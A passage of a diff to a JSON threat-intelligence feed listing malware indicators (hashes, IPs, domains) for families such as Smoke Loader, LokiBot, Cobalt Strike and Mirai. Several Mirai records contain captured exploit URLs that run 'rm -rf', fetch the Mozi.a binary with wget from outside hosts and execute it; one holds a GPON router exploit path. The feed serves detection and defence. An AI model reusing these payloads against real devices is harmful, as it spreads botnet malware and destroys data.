+ "58937dd6ca0bda4bf892dc233b063b8fcaf5896a70637fe459ba1e862835fa66" + ], + "malwareList": [ + { + "name": "Meterpreter", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5a0c2c74fbe954687e2ed69ff2d4692602f980fc", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272692570716, + "hash": [ + "1a29ed2d1ae240ec1d6f50dcc960baa3", + "caf7120a216a3a39bee558a6a660f1ffc214a712", + "2e4015f84a9a6d9c22ef65acc66a3cf55c2cabc2d7a6f32b96297ca7d0f56ea4" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "24562b6f8262142e4ef8c4cea3981e0c5f7e8f55", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272699665487, + "hash": [ + "99d2d851d197c52cf2fd9626e73dce82", + "d1356c69a78e899113ad752b82ac652279654d88", + "74535fa528fd18b9f2dde0f134c550a0ff557e708367dfb5be48b59670aa8c83" + ], + 
"malwareList": [ + { + "name": "ZLoader", + "aliases": [ + "Terdot", + "Axe Bot" + ] + } + ], + "threatList": null + }, + { + "id": "8eedaa1112c8c255ce5df9eb4ab554b2959db92c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272725461437, + "ip": [ + "52.84.102.11" + ], + "malwareList": [ + { + "name": "AnyDesk", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e0ab758533f1d2260526dc1a05c56b7ca632f494", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272727245005, + "hash": [ + "3b1b00a7a4ccfdf257b31d8e1701cf2f", + "8834aecbd48d2fb25ae921e7ca014606bc261717", + "6b7554d7fbfcc6f839225f07281c0ef20647ddfe6c60f63d49b9a6d6cd002eda" + ], + "malwareList": [ + { + "name": "AsyncRAT", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4326f63b71a81aee3b36dcdaa69272a5d86d3bd7", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "windows-server-2012-remote-desktop-service.max.com", + "seqUpdate": 17272735556758, + "malwareList": [ + { + "name": "Inno Stealer", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ce8a41887dbcdea0cac64ce4ce35bc7f02f5bd43", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272769830131, + "hash": [ + "6d9b8ff6442e3c42a7ad0e1238960057", + "fab711b446c2cc55f97c7a5afaa9f9833e01a0ea", + "a641af0462259586cf10b8867653e163f73b6066106455605643b08ab829ac77" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e7942002133e3086d1828f8b80b47f1cbd80202a", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": 
"2024-09-25T00:00:00+03:00", + "seqUpdate": 17272797188193, + "hash": [ + "cddb077d424a9972b8bd826318bb90ac", + "19a3db1f52901760a06a4f539933cafe8404a56b", + "bc151a1ea4f9ba8645ca5ec661e38cbd26912f37d1046fd89461dd7ca343daa7" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "8d85fe22e6406173ac62f810a5496436069ab72d", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272840903611, + "hash": [ + "4190a525416d4f3edfcd5cffdfb60f73", + "172834467c51d57023c173d2d8b585ac58658507", + "c4bf09c2ac250f259adf788afb287c917b89dda839ed6b0afe707b5fdb6b0a7e" + ], + "malwareList": [ + { + "name": "Metasploit", + "aliases": [ + "MSF" + ] + } + ], + "threatList": null + }, + { + "id": "8dc39f468265c244a6c5a636ce8fd999d59402ca", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272887997768, + "hash": [ + "6ca864a9497cfa7c1051e554bd0e4b85", + "d58406507746bc7546da7030cd0d1884d0fe87ad", + "8c371f725a3f2b47c3fdf6aa1d6f36a8f1009bd7e3e27482db77636575169e9a" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "7efddc4264a802c23ecebeb44ece6974c16d15f0", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272887997995, + "hash": [ + "f4cb4f7a6851e37b7a49efe99d700ebc", + "8480cd9e604facd098b287ce21682960b7342639", + "6e557771a2607aacfeaf5d12dee1ba51b1b4795d941aa52bc45056b3b9f60539" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "cbebdc572b5fad4bee31345aceb48419652af695", + "type": "file", + 
"dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272887998300, + "hash": [ + "165c7a714eeddbbc502dd46416d9ad11", + "eaf07cb52275c928a4daa1253f647ac867eb0543", + "18c7ee7b77e29681023b75fb648715001e48f66fb93508dcc21bd9918ec2b161" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "151d3b357cd8d137e83a24cd573c8670d515eede", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272887998560, + "hash": [ + "3897788dc43eb1b386f6e18ba3cdaab6", + "e852936f0b42c92aece9ec44c89260382c75b8fe", + "c48f091f057a7a229aeb123a7e382a565da9bf30efd8fc20f004f9b006ebe61c" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "238c27a03fd9900c2237a461c3c266585dd31cb1", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272887998809, + "hash": [ + "98caab822f6809c07bfbce5b1d9590b0", + "1268ae13e97e20b535d67593f4c2a33644a906cf", + "630e1dd423feb4af15dacd299d62785b95c7d5035c8b3421063dfce922a2fd3b" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "3b60c7c03e391af588e82a52c4af0eeb09b37a38", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://45.66.100.9/shell?cd+/tmp;rm+-rf+*;wget+http:/103.208.233.145:60443/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272897355463, + "ip": [ + "45.66.100.9" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "eae5bc6cbda8ea907e9a807888d909c6b3424135", + "type": "network", + 
"dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272897355613, + "ip": [ + "103.208.233.145" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5a05df57d0fdbb26740cf1eae3fe6f99da4cb66d", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272939352180, + "ip": [ + "51.158.122.136" + ], + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0541bced46a976ad3e0e37496972f54f507d9f28", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "cfsauetaylorfarmsfloridabe71d6086cff768a4da65e70fd501927.rz-ops.com", + "seqUpdate": 17272939352508, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "dadb46deadde698a90b5596449ec31f36cee69dc", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "gitlab.medicaltech.it", + "url": "https://gitlab.medicaltech.it:443/GponForm/diag_Form?images/", + "seqUpdate": 17272962218020, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "70fa31bd670cc6768c8c49a12236cc8e26849042", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272985774751, + "hash": [ + "a4c1ff107b86f104cffd3031bc2a51aa", + "8c804346c8be0852424579964cd385fe0e0a1901", + "a707ff505eec288970153f8ae9823bc12c6291842f24d2297db723dd8b255c8a" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "89bbd4844ae0ce3e568f0e9c344fdec35f226a18", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + 
"dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273035810963, + "hash": [ + "4b7c9bdfa6dc7e2a71ab0fa1a7e91a1e", + "a13fcef694ded8f2e694f64325dc1d68d0139af4", + "b7e1de93c32e9124c586d00d3039247f4ee859094d215b6c90e16194b987981c" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fa5af0e628918de2bfaf78c33ac4e80eb097dd4b", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273035811325, + "hash": [ + "7d094c5bce6b6f8f1449813fb392cdda", + "a95923432e89bc66baa4f4e318ba82d7041945b7", + "12169841fee5469e2630384f9d9721437848273054dc5e56d33c24c6faf62096" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "80e9d3ae083d572639e8a0f405fd2aab6b71b92e", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273035811539, + "hash": [ + "dcfd9aacae4f3fc8a8189d3db10e6be4", + "40a79f79f72587f1370ee41150cfe521d7c7f4f0", + "15fc81ef32f57816ec299890ce30165cdb839f1225b12b1eea6f6405e6de89d5" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3e9f6d6df2783cc194ca6882f67d2aa96fb27283", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://194.143.143.46/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273079651499, + "ip": [ + "194.143.143.46" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cbef35401ce384bb492dabd38cfce272a11752ad", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273079651572, + "ip": [ + "103.247.52.141" + ], + "malwareList": [ + { + "name": "Mirai", + 
"aliases": [] + } + ], + "threatList": null + }, + { + "id": "ddafd6082a607fb763bca1326b63ee2e1af1437a", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://185.186.92.199/shell?cd+/tmp;rm+-rf+*;wget+http:/113.239.209.43:58567/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273079651794, + "ip": [ + "185.186.92.199" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3e2ccc04cfa964dd54c22d8f79c8d2884563d3e1", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273079651927, + "ip": [ + "113.239.209.43" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d03410b710142194d375582f83acb565bde287eb", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273115307296, + "ip": [ + "186.155.86.170" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8e0a309878c5e40f4a04ede32750c6768858e266", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-10-18T00:00:00+03:00", + "url": "http://91.241.87.252/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273115307614, + "ip": [ + "91.241.87.252" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d1ad1a79a4a518ff51ba490dc2819a52efb7bc24", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273115307676, + "ip": [ + "120.86.237.169" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": 
"43cde1b48ad8eb5fde95217839f268ca3debccc1", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273151192518, + "ip": [ + "90.177.191.151" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "53716bbf5b8e31103c56c8a43af8f688cbcdcc93", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://91.241.86.111/shell?cd+/tmp;rm+-rf+*;wget+http:/110.24.36.171:47663/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273151194625, + "ip": [ + "91.241.86.111" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "474a3579197ebe7b9edca9edba6a4b7e048af006", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273151195496, + "ip": [ + "110.24.36.171" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4a4483f8d2b9c65c8cc9c84ec669d43346a58d15", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-10-01T00:00:00+03:00", + "seqUpdate": 17273151199676, + "ip": [ + "219.150.88.234" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5bfdc6fd50ff164d7df49890513fd875b44514e7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198620157, + "hash": [ + "7f2a32b207a010271cf6215234b7685a", + "fe00fcab47f014e219a6bf69246952019e8e16bc", + "50e6c0b76a24cfd2082fe35cdccd2197c5cc7df87a2e29ebb6eab40135eb3565" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7c8bf9a0e7e2fe0b07a21aa7613d0d6d563ef9b7", + 
"type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198620486, + "hash": [ + "ee573301079d71a403e017309e94ad51", + "c61885baeef88f012fcd5bc3ca4ea6593136e303", + "4ada819d00b8700daeacbbdc8afdc37f47a9f0efd11dff64c0ceeaede25b9ee0" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3143980569308b8d59c3fa64d39551f6acffe07b", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198620757, + "hash": [ + "cb3b777dfa7054b788a2c270c0b9a38b", + "9c51dd4ba93ff13f0ce45af5e69f6e55b1525796", + "47febb59292c68e7024fbba365c148fe0758a6cef56212c8d066e3be7b6f6253" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0f512348683028b3f24122aa99b8e72f84db0909", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198621040, + "hash": [ + "3f2349f14312448abdcf857f9deb9ab6", + "79ce6cf1de8c65341d6fbe303eb6944f4a157fde", + "769434efbec02d4241947416c8c39782a9fefa4170a0f286370efe99e17a13d2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6e361ade41543b8450277b0bfbd6480f5bfc5de8", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://185.186.92.29/shell?cd+/tmp;rm+-rf+*;wget+http:/175.10.18.202:60598/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273203288712, + "ip": [ + "185.186.92.29" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c74244f1c048c943e241a5f8f1d1d461ae4d06dd", + "type": "network", + "dateFirstSeen": 
"2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273203289730, + "ip": [ + "175.10.18.202" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7b561b1d003f7facf9e7745cc7cb71a84ba03b6e", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273231552907, + "hash": [ + "cd895eb7d87dce148b8d0882e8a245d0", + "973714d545c11dcba9232949e8f5ab2efe47faad", + "0919da3876fa60365f0e5953e044738294c955c9110978713aad0ba04eea2f32" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "773affccc1bf8a39f2d43cce1521e71032028369", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273231553234, + "hash": [ + "c4d5d6d84dbd1243322ca9ed86964f6e", + "58c9693d71410518926fe192d2b1389ef4a42011", + "4d344d744638acb8c16cb6829e17aea4a8f03963f73efad98885ce2ee0d6f405" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "3e1ea9d0f0a128145e4b05f45ef9793759343597", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273232677864, + "hash": [ + "acbbc52b1e1e1e34c4146f56eaf57a83", + "b8f4bd6eb30dad98087a8d76bd09238bc4e73e7e", + "fe9a8aca6fb501e4f17789d54b948867a0fa9c588773345628fb9a4165c29651" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "0d481af2532b9233212dab32215162058af8c386", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273238837197, + "ip": [ + "112.206.28.249" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + 
"threatList": null + }, + { + "id": "b802d3ec8fc388a7094f7623563a2d55990099d6", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273285213276, + "hash": [ + "263e30f0fa99dcd2d41aa58e1fa081c6", + "d204ea73b9308156234635504abdaa5cc9ae8d28", + "ca965f99c2abe45eff63b0fe547ba74aa001fc965425eae8c9fe77b0d7c45ba4" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7c2e5fb83a4e87fa3b318d55924ab5c6a9c4c358", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273340409979, + "hash": [ + "d8f3c45024394ba14e5cafca1efbc652", + "3ee7e797968e615d0e76a68466b722ff8ebdcc64", + "fa495492a6ee42a9a65fcdb14a75112225c6355daad797af9ba10351a7b2dc1f" + ], + "malwareList": [ + { + "name": "Buran", + "aliases": [ + "Vega", + "Ghost", + "VegaLocker", + "Jamper", + "Jumper", + "Zeppelin ", + "loplup" + ] + } + ], + "threatList": null + }, + { + "id": "2a177f296a5d2ca811631dfc54c4412684411f29", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "https://45.66.100.37:443/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273341593355, + "ip": [ + "45.66.100.37" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a0b197f12f8eed03c805bcf27a786e4dea87dede", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://45.66.100.37/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273341594317, + "ip": [ + "45.66.100.37" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": 
"7622133388fb513e56df40b647496e4872372767", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273341595632, + "ip": [ + "27.43.206.192" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8ea6406615f40406de8803b2550398cce1bbc04e", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273358195065, + "ip": [ + "172.86.64.128" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "79c214e8b6501cb5c67ac3aa0bd583454b7dc1ed", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273368882438, + "hash": [ + "02cba41cdbca2322c909d58e16cccdd1", + "34bfcbbbe7b370e6a56a2fc34107502806cde49c", + "aeca391fe0a4ea479cc91f7709e1571c03d7aa5a179312b837b85c43768da0e8" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3360c6a3810089aedfb1c6887694d1e663789f7b", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "1857685.ru", + "seqUpdate": 17273370246485, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "ae84f5ad9938be2f8a841894eb8926bd73046b1a", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "accouts-verification.ru", + "seqUpdate": 17273370247355, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": 
"43e60d7478ef0699e9caeccbb3c579bc35e12e65", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "296785671.ru", + "seqUpdate": 17273370248063, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "431b34f04b113df6aea7d8ad14a3bc0603c4e3cc", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "users-mail.ru", + "seqUpdate": 17273370248715, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "846aabcfb31bae2b01e88cf2616bc3c072c3f133", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273469197038, + "hash": [ + "a53fe97c6cf28353e40dd13ee1074228", + "89c029c1e6340cf420eff6f847a3c4989b6f7a9e", + "29541ffa1a4a7f21d4f305140ad3b90326ad603d1172f829f768fcbeb8717f34" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6252882f94758b66671f9a601aa863922be1206b", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://91.241.86.106/soap.cgi?service=WANIPConn1", + "seqUpdate": 17273479367859, + "ip": [ + "91.241.86.106" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "828b7b8fcc82062518ece671784ff6ed27ead0b2", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273479369040, + "ip": [ + "59.184.246.55" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "233ff1b280dc6084d423f51dbd07e39c1e3f8fe7", + "type": "file", + "dateFirstSeen": 
"2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273513486941, + "hash": [ + "72b34e57129effa882c2abe30c0dda8e", + "0c59eac2222805a2a9fc5182bcec48404c52c01c", + "fcebc71a48b833c944a695f4c3254e7ea2afedb0379b526ba85ceee7d7e12013" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "4dd34d6d463ed23a007aa59bf2d88352c0f82a5f", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273514479575, + "hash": [ + "c8fde8fa8468d84b417113a1c85b65ea", + "01cf7d79dd41cc00e02d05d20d4215dffe6982e6", + "9a1197f8a9d4852c98b73f2abbcdfbb3f2334f2902bb7b3406cb7fd661780840" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5c230ad9bd35d5e217c166255e34cd4a336b3d85", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273514483034, + "hash": [ + "c8fde8fa8468d84b417113a1c85b65ea", + "01cf7d79dd41cc00e02d05d20d4215dffe6982e6", + "9a1197f8a9d4852c98b73f2abbcdfbb3f2334f2902bb7b3406cb7fd661780840" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "93de2624110157fdeb775bbe21d691e75b405fd8", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": 